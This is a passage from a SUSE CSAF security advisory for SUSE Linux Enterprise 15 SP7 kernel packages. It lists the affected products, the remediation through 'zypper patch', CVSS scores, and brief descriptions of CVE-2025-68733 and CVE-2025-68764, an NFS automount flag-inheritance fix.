"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68733",
"url": "https://www.suse.com/security/cve/CVE-2025-68733"
},
{
"category": "external",
"summary": "SUSE Bug 1255615 for CVE-2025-68733",
"url": "https://bugzilla.suse.com/1255615"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68733"
},
{
"cve": "CVE-2025-68764",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68764"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags\n\nWhen a filesystem is being automounted, it needs to preserve the\nuser-set superblock mount options, such as the \"ro\" flag.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68764",
"url": "https://www.suse.com/security/cve/CVE-2025-68764"
},
{
"category": "external",
"summary": "SUSE Bug 1255930 for CVE-2025-68764",
"url": "https://bugzilla.suse.com/1255930"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
